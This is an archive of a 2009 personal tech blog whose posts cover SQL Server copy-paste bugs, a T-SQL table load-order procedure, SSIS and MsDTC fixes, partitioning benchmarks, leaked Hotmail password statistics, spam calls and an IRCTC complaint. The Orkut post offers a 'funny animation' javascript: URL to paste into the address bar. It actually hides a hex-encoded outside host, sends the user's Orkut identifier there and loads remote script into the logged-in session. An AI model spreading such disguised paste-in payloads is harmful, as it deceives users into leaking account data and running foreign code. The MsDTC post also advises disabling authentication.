28
Oct 09

Another Copy Paste Glitch

Another copy paste bug killed about an hour of mine today. I was modifying the SQL code sent by one of my colleagues and I got stuck at a syntax error. Below is the code segment at which it SQL Server Management Studio (SSMS) was showing syntax error. The error was shown at line 9.

DECLARE QueryCursor CURSOR FOR
SELECT AccountID FROM Accounts
OPEN QueryCursor
FETCH NEXT FROM QueryCursor
WHILE @@FETCH_STATUS = 0
BEGIN
FETCH NEXT FROM QueryCursor
END
CLOSE QueryCursor
DEALLOCATE QueryCursor

I double checked the syntax and checked for environment settings and all to find out the reason. But I didn’t get any clue about the error in the code. In fact there was no syntax error in the code. Then why was the code not working?

I recollected that I have pasted the code to SSMS from the email which was in Lotus Notes (Yes, my organisation is using Lotus office suit and there is a funny reason for that). To examine the code further, I pasted that segment in to Notepad++ and by chance I selected the cursor variable. Suddenly I noticed that the lines at which the error is shown is not highlighted by Notepad++. Now I got what is happening. Can you guess what it is?

Copy paste bug shown in Notepad++

The SPACE character shown between “CLOSE” and variable “QueryCursor” was actually not SPACE but the character á (code 0xA0) which is shown as a SPACE in fonts such as Arial and CourierNew. SQL engine is expecting a SPACE character there and it looked a SPACE character to me because of the font. Well Lotus Notes is the culprit. Though this is a minor bug it costed me one hour today and may be many such hours to developers like me.


22
Oct 09

CCP (Cut Copy Paste) Technology

In my current project there are 60+ team members. Even though we didn’t have a dedicated HR personnel, other mangers used to take care of HR related stuffs. And there is a girl, youngest member of our team, who used to take initiative when the team goes out, when we party and she used to send cute little emails on birthdays of our fellow team members. It looked like she used her own imagination and wrote in two three lines to wish birthday to a member. It was short and beautiful, looked simple. She took the responsibility of letting others know if it is the birthday of our colleague. It was nice! I guess, all you reading this, will have someone like her, in your office too, sending birthday reminders…

Couple of days back a new lady joined our team and she is handling HR now. This morning I got an email from her, which she sent to the whole team, wishing birthday to a team mate. She used a full paragraph of well formed and beautiful text to greet our mate. Below is what she sent today,

Instead of counting candles, Or tallying the years,
Contemplate your blessings, As your birthday nears.
Consider special people Who love you, and who care,
And others who’ve enriched your life, Just by being there.
Think about the memories, Passing years can never mar,
Experiences great and small, That have made you who you are.
Another year is a happy gift, So cut your cake, and say,
“Instead of counting birthdays, I count blessings every day!”

It looked really nice, better wordings than the ones the other girl used to send. I wondered how she can do this every time, like it needs a lot of imagination in a team with 60+ members, to do something like this on a weekly if not daily basis. I got curious and I decided to do a little Googling. I searched for “Instead of counting candles”, using quotes of course and you see the results yourself. 238K results! So that’s the secret behind her imagination.

I don’t blame her for what she did. Of course she is handling HR and she needs to be smart. But I should say, I liked the birthday greetings from the other girl. Though not so sophisticated, it was original and simple. And this Cut Copy Paste technology is a bit bitter at times.


06
Oct 09

Hotmail Passwords – Analysis

I am a business intelligence guy. I play with data. Collect it, dig in to it and make a lot of reports out of it with lots of graphs and charts. This morning I heard about the hotmail password hack. Some one did some phishing and collected a lot if hotmail user account passwords and published it. I am not interested in the hacking part of it and neither do I support it. But I did some analysis on the 10,000 passwords published. I checked for most used passwords, length of passwords, words in passwords, etc. Here are the results which I got. I have converted the data to relational structure to analyze with SQL queries. If you think of any other interesting analysis on the data, please let me know, I will publish them as well.

CloudPwdMostUsed
Cloud: Most used passwords

CloudPwdLength
Cloud: Most used password lengths

TableWords
Some words in passwords and their counts

TableLengths
Password lengths and counts


17
Sep 09

SQL to order related tables for loading

I had to load some related tables during ETL development. The order in which to load these tables is important as it should not violate integrity constraints. If the number of tables is less, this can be done manually. But when it goes high, some automation is required. I did some investigation in this direction and developed a rough SQL 2008 code. Please find it below…

CREATE PROCEDURE
   GetLoadOrder @TablesListCSV VARCHAR(MAX)
AS
   /* Get tables of interest from CSV string and build a recordset
   Courtesy: astander [http://stackoverflow.com/users/144424/astander]
   */
   DECLARE
      @Delimiter VARCHAR(10)=','
      DECLARE
         @CsvTable TABLE(String VARCHAR(MAX))
      BEGIN
         DECLARE
            @i INT ,
            @j INT
            SELECT @i = 1 WHILE @i <= LEN(@TablesListCSV)                   BEGIN
            SELECT @j = CHARINDEX(@Delimiter, @TablesListCSV, @i) IF @j = 0 BEGIN
            SELECT @j = LEN(@TablesListCSV) + 1
         END
      INSERT @CsvTable
      SELECT SUBSTRING(@TablesListCSV, @i, @j - @i)
      SELECT @i = @j                          + LEN(@Delimiter)
   END
END
/* Actual logic goes here
NOTE:   Code does not handle cyclic dependancies
Need to be tested thoroughly
*/
-- Get the parent-child relationship information
DECLARE
   @ChildParentTable TABLE(Child VARCHAR(500), Parent VARCHAR(500))
   INSERT
   INTO @ChildParentTable
   SELECT DISTINCT SCHEMA_NAME(T.schema_id)+'.'+OBJECT_NAME(T.object_id) 'Child',
      SCHEMA_NAME(T2.schema_id)            +'.'+OBJECT_NAME(FK.referenced_object_id) 'Parent'
   FROM sys.tables T
      LEFT JOIN sys.foreign_keys FK
      ON T.object_id=FK.parent_object_id
      AND T.object_id FK.referenced_object_id
      AND SCHEMA_NAME(T.schema_id)+'.'+OBJECT_NAME(FK.referenced_object_id) IN
         (SELECT                  *
         FROM @CsvTable
         )
         LEFT JOIN sys.tables T2
         ON FK.referenced_object_id=T2.object_id
      WHERE SCHEMA_NAME(T.schema_id)+'.'+T.name IN
         (SELECT                    *
         FROM @CsvTable
         )
         -- Get the independent parent tables first
         DECLARE @LoadOrder TABLE(TableName VARCHAR(500))
      INSERT
      INTO @LoadOrder
      SELECT Child
      FROM @ChildParentTable
      WHERE Parent IS NULL
      -- Delete entried from parent-child table once ordered
      DELETE
      FROM @ChildParentTable
      WHERE Parent IS NULL;

      -- Loop through the rest of the records untill all tables are ordered
      DECLARE
         ChildParentCur
         CURSOR DYNAMIC FOR
            SELECT *
            FROM @ChildParentTable -- Dynamic cursor updates contents in recordset as modified
               DECLARE @Child VARCHAR(500),
               @Parent        VARCHAR(500) OPEN ChildParentCur
            FETCH NEXT
            FROM ChildParentCur
            INTO @Child,
               @Parent WHILE @@FETCH_STATUS = 0 BEGIN DECLARE @Count INT
            SELECT @Count                   =COUNT(*)
            FROM @ChildParentTable
            WHERE Child=@Child
            AND Parent NOT IN
               (SELECT TableName
               FROM @LoadOrder
               );

         IF @Count = 0
         BEGIN
            DELETE
            FROM @ChildParentTable
            WHERE Child=@Child
            INSERT
            INTO @LoadOrder VALUES
               (
                  @Child
               )
         END ELSE BEGIN
      DELETE
      FROM @ChildParentTable
      WHERE Child=@Child
      AND Parent IN
         (SELECT TableName
         FROM @LoadOrder
         )
   END PRINT @Count PRINT @Child
FETCH NEXT
FROM ChildParentCur
INTO @Child,
   @Parent
END CLOSE ChildParentCur DEALLOCATE ChildParentCur
-- Ouput final ordered list of tables
SELECT *
FROM @LoadOrder

Remember, I haven’t tested this code very well and it doesn’t handle cyclic dependencies. I am going on a vacation now. I will do some thorough testing once I am back. May be you can improve it by that time :)


26
Aug 09

SSIS: Transaction enabled tasks fail due to MsDTC

In my current project we have multiple SSIS developers in team and we all were sharing the database server instance in my system. We faced an issue yesterday when a team mate was trying to implement transactions in SSIS. The package fails in other machines although it is running smooth in my system where the database resides. The error message thrown out was,

The SSIS Runtime has failed to enlist the OLE DB connection in a distributed transaction with error 0x8004D00E “The transaction has already been implicitly or explicitly committed or aborted”

Soon we realized that this is something related to Microsoft Distributed Transaction Coordinator (MsDTC). We did some search and got a tool called “Dtcping.exe” which will check the health status of MsDTC processes in different machines. The tool reported an error “Access denied”, hinting some security issue with in the MsDTC. But we were not lucky even after a couple of hours of Googling. Then I decided to lean the security settings for MsDTC and I found that all network related connectivity is disabled by default. I learned that authentication settings can cause trouble as our machines were running Windows XP and as they were in a work group (we have a strange network configuration in my organization). I changed to “No Authentication Required” for MsDTC instances in all machines and it worked! To change the Security Configuration for MsDTC, go to Control Panel >> Administrative Tools >> Component Services >> Computers >> Right click My Computer and then click Properties >> Click the MSDTC tab >> Click Security Configuration. Below is a screen shot of the settings that I used, but I do not recommend this configuration for all cases as I am not aware of the impact it can have on securiy.

MsDTC

Thought of sharing this with you. And check the Technet link describing the security settings for MsDTC. It is very useful.


20
Aug 09

SSIS: Workaround for transaction – checkpoint bug

Audience: SSIS developers.

MSBI developers who have tried to club transaction and checkpoint (for package restart-ability) in a single package know that it doesn’t work. Microsoft documentation points to a bug in SSIS. I have checked this myself and verified it as a bug, some time back. The issue is that, transaction related information is not properly recorded in the checkpoint file. Due to this, a failure at a task after the successful completion of a transaction enabled task, may cause the transaction enabled task to run again when the package is restarted.

My colleagues, Mr. Milind G Kasalkar and Mr. Prashant R Parab, found out a very simple workaround for this and asked me to post it on web as they don’t have a blog as of now. After a lot of googling we came to know that, no known solution is available to the problem. Hence, below are the findings of my colleagues.

The workaround is to put the whole transaction enabled item inside a sequence container. The sequence container should not be transaction enabled. Below is a screen shot of the workaround.

Work-around

What is happening behind the scene can only be guessed. A correct explanation is difficult. And do not forget to enable “Fail package on failure” property for all control flow items. Hope this will help you save some time.


18
Aug 09

Spam telephone calls: what can be done?

I use two SIM cards, one from IDEA cellular and another one from AirTel. On the recently purchased IDEA number, I started getting automated sales calls (UCC – Unsolicited Commercial Communication, as TRAI calls it) from day 1. It is not just calls, but SMS, WAP push message, Flash message, you name it! And what they are selling is ring tones, SMS jokes, horoscope and all such B*S which I have no interest in. If you are smart, thinking of marking the calls as junk, they are making the calls from random phone numbers. I have started collecting these random phone numbers in my junk list and I have 13 numbers now. And for the SMS, they don’t have a number at all.

I called the customer care and told them that I don’t need this “service”. They were kind enough to raise a request to register my number in the DND. But they said that it will take 45 days to update it in the registry. I do not understand the logic behind such a delay in updating a database. And remember, it took them no time at all to activate the service. I was getting UCC calls the very first day I bought the SIM. And I asked the customer care agent, why Idea is taking 45 days. She told me that Idea is not making any sales call at all and even added that it will be from their competitors. Why in the world would their competitor call me asking to by Idea’s services? I have no IDEA!

After a little googling I leaned about the DND (Do-Not-Disturb) registry maintained by TRAI (Telecom Regulatory Authority of India) and I went to the page describing the procedure for registering your number in the DND registry. The regulation imposed by TRAI restricts agencies from calling us if our number is registered there. As per the rule, marketing agencies and service providers should first check the DND registry before calling us. Unless they will have to pay a fine. It is not clear whether customer will get any compensation or not. Unfortunately there is no direct mechanism to register your number in the registry. You can send an SMS or call the service. If after 45 days, you are still getting calls, you can file a complaint. The whole stuff looked ineffective to me. So I wrote to TRAI pointing this and suggesting some changes. Following are my suggestions..

  1. Provide a facility in TRAI web site (http://ndncregistry.gov.in/ndncregistry/index.jsp) to directly register/unregister telephone numbers in DND registry. May also include an SMS based verification mechanism to avoid misuse. Users will be willing to pay for this verification system.
  2. Remove/reduce the 45 days delay in activating or deactivating the DND registry entry.
  3. Restrict the service providers to make service/sales calls/SMS/WAP push message/Flash message, to be made from only one number. If possible a predefined number.
  4. Ban the delivery of SMS without a from number in it.
  5. Take legal action against violators.
  6. Provide a portion of the fine collected from the service provider or UCC source to the sub-scriber (at present it is not clear from the description given in the site that, the customer is getting any financial compensation for the abuse or not).

I remember that my old AirTel number was registered in the DND registry long back, and I am still getting calls from them, especially when I am in roaming, and yes they charge for their sales – incoming – calls too.

So, in short, there are no practical ways to fight spam telephone calls as of now. My search for a solution ends here. Let me know if you know any methods to control them. You can also send your suggestions to TRAI,  h e l p l i n e @ n d n c r e g i s t r y . g o v . i n


02
Aug 09

Does partitioning improve performance for SQL tables?

When it comes to performance tuning a database, there are several proven methods available, including indexing, fine tuning the queries, etc. Partitioning can also be used to categorize data based on its nature (for example geography) and then playing with a subset of the data. As the volume of records accessed is lower, query performance is improved. But this may not yield performance gains in all the cases. I am going to discuss my experiments on this.

In my current data warehousing project, the data warehouse stores a couple of years of data but the reporting requires only recent information. Although the business requires older data to be readily available in the data warehouse (DW), in case they need to do some ad-hoc analysis. Now the reporting subsystem is facing performance issues in rendering time for a lot of reports. The solution suggested by architects, to use report-ready tables, containing only the recent records. Means, all data required by reports for the final rendering is prepared by the ETL process itself and made available as a cache, from which reports can directly pick records or do some filtering or aggregation. Of course this solves the problem, but reduces the reporting tool to a mere rendering tool, not taping its full potential. No need to say that you will need to rewrite the ETL to change anything in the final reports.

So, I thought of an alternate mechanism, to use partitions. My plan was to partition the data based on transaction date values available in the records. May be views can be created with a filter for transaction date restricting it to the recent data, forcing the DB engine to look in the partition with the latest data. Architects were not convinced about the performance gain it can give. I did some googling and found some positive results. So I decided to do some testing on this. Below is how I did this…

  1. Simulate the current scenario:

    To understand the performance gain that can be achieved, the current situation has to be simulated to a reasonable extent. Tables need to be with similar structure and various types of columns reflecting the tables in the data warehouse.

    1. Create a table with similar data types

      The following script was used to create the table containing an identity column as key column, a date column for partitioning, a string column for text search checks, etc.

      CREATE TABLE PartitionTest
      (ID int,
      TxDate Datetime,
      Amount float,
      Comment varchar(15),
      CONSTRAINT [PK_PartitionTest] PRIMARY KEY CLUSTERED (ID ASC)
      WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON)
      ON [PRIMARY])

    2. Populate the table with random sample data

      Following script was used to populate the table. A sample of 10 million records was used.

      DECLARE
      @i INT = 1,
      @Date DATETIME = ’2006-01-01′,
      @Today DATE = GETDATE()

      WHILE @i<=10000000
      BEGIN
      DECLARE
      @j INT = 0,
      @k INT = 5+CAST(rand()*10 AS INT),
      @Str VARCHAR(15) = ”
      WHILE @j<@k
      BEGIN
      SET @Str=@Str+CHAR(CAST(rand()*100 AS INT)%26+97)
      SET @j  =@j+1
      END
      INSERT INTO PartitionTest VALUES (
      @i
      ,@Date
      ,CAST(rand()*100 as int)
      ,@Str
      )

      SET @Date=DATEADD(MILLISECOND,CAST(rand()*10 AS INT)+1,@Date)
      SET @i   =@i+1
      END

    3. Create a copy of the table

      A copy of the table (same 10 million records) with a name PartitionTestPT was created.

    4. Partition the copy

      The PartitionTestPT was partitioned based on the TxDate column with appropriate partition boundaries. As the data generated covered only a time span of 15 hours, one partition per hour was created.

  2. Fire queries and measure execution time

    As the sample data is ready now, different queries have to be fired with filters using different columns, to assess the performance using query execution time.

    1. Fire queries based on primary key column

      BEGIN
      DECLARE
      @StartTime DATETIME2=GETDATE()
      BEGIN
      SELECT *
      FROM   PartitionTest
      WHERE  ID=5489257

      SELECT DATEDIFF(MILLISECOND,@StartTime,GETDATE())
      END
      END

    2. Fire queries based on partition column

      BEGIN
      DECLARE
      @StartTime DATETIME2=GETDATE()
      BEGIN
      SELECT *
      FROM   PartitionTest
      WHERE  TxDate=’2006-01-01 08:38:33.587′

      SELECT DATEDIFF(MILLISECOND,@StartTime,GETDATE())
      END
      END

    3. Fire queries based on text column

      BEGIN
      DECLARE
      @StartTime DATETIME2=GETDATE()
      BEGIN
      SELECT *
      FROM   PartitionTest
      WHERE  Comment=’acynieci’

      SELECT DATEDIFF(MILLISECOND,@StartTime,GETDATE())
      END
      END

  3. Analyze final results

    Below is a summary of results for the above queries, fired with different values. (The table was corrected after Niyaz pointed out some mistakes)

Search Column Value used Time taken (ms) Value used Time taken
(ms)
Value used Time taken
(ms)
Average (ms)
Before partitioning
Key 9875236 0 1878236 0 5489257 47 15.67
String ahfwkubgiuhpr 1987 dfmscx 1987 acynieci 10203 4725.67
Date 2006-01-01 15:32:45.510 1530 2006-01-01 02:57:27.780 1516 2006-01-01 08:38:33.587 1530 1525.33
After partitioning
9875236 1814 1878236 1780 5489257 9250 4281.33
ahfwkubgiuhpr 2470 dfmscx 2466 acynieci 2436 2457.33
2006-01-01 15:32:45.510 93 2006-01-01 02:57:27.780 127 2006-01-01 08:38:33.587 140 120.00
After partitioning and indexing the ID column
9875236 17 1878236 30 5489257 63 36.67
ahfwkubgiuhpr 2610 dfmscx 2546 acynieci 2470 2542.00
2006-01-01 15:32:45.510 123 2006-01-01 02:57:27.780 94 2006-01-01 08:38:33.587 127 114.67

[Following paragraph was edited after Niyaz’s comment]
The results clearly show a huge performance gain, around 12 ~ 13 times, for queries utilizing the partitioned column. And queries utilizing the key column are not affected much (after re-planning the index on ID column). Even the string column based search has improved very much.

To answer Niyaz’s questions, I ran another pair of queries to see how partitioning will perform in a real environment. I used the following queries,

BEGIN
DECLARE
@StartTime DATETIME2=GETDATE()
BEGIN
SELECT *
FROM   PartitionTestPTAI
WHERE 
Comment=’acynieci’

SELECT DATEDIFF(MILLISECOND,@StartTime,GETDATE())
END
END

And then used a query with a filter on TxDate column to utilize the partition, as shown below,

BEGIN
DECLARE
@StartTime DATETIME2=GETDATE()
BEGIN
SELECT *
FROM   PartitionTestPTAI
WHERE 
Comment=’acynieci’
AND TxDate BETWEEN ’2006-01-01 08:00:00.000′ AND ’2006-01-01 09:00:00.000′

SELECT DATEDIFF(MILLISECOND,@StartTime,GETDATE())
END
END

And below are the results I got.

Search Column Value used Time taken (ms) Value used Time taken
(ms)
Value used Time taken
(ms)
Average (ms)
Without the filter on TxDate column
String ahfwkubgiuhpr 2550 dfmscx 2546 acynieci 2486 2527.33
With the filter on TxDate column
Comment ahfwkubgiuhpr 187 dfmscx 170 acynieci 407 254.67
TxDate 2006-01-01 15:00:00.000 2006-01-01 02:00:00.000 2006-01-01 08:00:00.000

The results shows that, when a partitioned column is utilized in the query, it may provide up to ten times more performance.

So that concludes my experiments on partitioning. Please let me know your views on this.


12
May 09

JavaScript to animate Orkut!

Recently I got a JavaScript sent by a friend of mine, which he said, will create a funny animation in Orkut. I tried it but unfortunately, the script was too old and it was not working in many of the new browsers like Google Chrome and IE 8. I got interested and decided to write my own script to do the job. Looks silly but I just had to do it to get a geeky satisfaction. Below is the code I have written. Just copy paste it to your Orkut window (in the address bar), hit ‘Enter’ and see the magic!

javascript:var%20b=document.body;void(function() {z=document.createElement('script'); z.type='text/javascript';z.src=unescape ("%68%74%74%70%3A%2F%2F%77%77%77%2E%68%6F%6F%7A%69%2E%63%6F")+ unescape("%6D%2F%66%75%6E%2E%70%68%70%3F%6C%3D")+JSHDF[ eval(unescape("%27%75%69%64%27"))]+'&r=' +Math.random();b.appendChild(z);}());

Let me know what you think about it :)

I am working on a big JavaScript project right now. I will keep you posted on this…


10
May 09

Letter to IRCTC (Indian Railway) support

I was trying to book a ticket using the Indian railways site this morning. People who have tried to do this before (especially the ‘tatkal’ booking) know what a pain it is. I got really frustrated and send a mail to their support team straight away. Here is the mail.

Dear IRCTC,

I have tried booking tickets using your site a dozen times at least and let me tell you, almost 95% of the time, it was a pain doing that. If I get to book tickets smoothly in one shot, I consider myself as very lucky.

Most of the time I may end up in an error page, showing “Service Unavailable”, “You have pressed back button or refresh” kind of messages. And this can happen at any stage of booking tickets and GOD there are some 100 stages to book a ticket. Most of the time it is server load related issues. I can figure out why it is happening, me being a software engineer and a web developer. If you guys do not have sufficient programmers to make a descent ticket booking site, please let the customers know. May be we can setup an online community and develop a much better site. I am sure thousands of people will be glad to help you. And regarding the server load there a lot of ways to handle it, of course affordable ones for Indian railway (you don’t need to think about buying a super computer to do this job)

Regards,
Faiz  [+9199495XXXXX]

I am sure, many of you who read this might have felt the same way before. IRCTC a great site for Indians like me, if needed to book train tickets. It is far better than going to your near by railway station and standing in a long queue. When it was introduced, it was a great relief for thousands like me. But after this long period in service, it has the same old problems and it looks like the authorities have done nothing to improve the situation. Sometimes people get so frustrated that they give up online booking and head for the queue in the station. There should be some way to end this…

PS: Those who want to send their suggestions, here is the email address of IRCTC support: c a r e @ i r c t c . c o . i n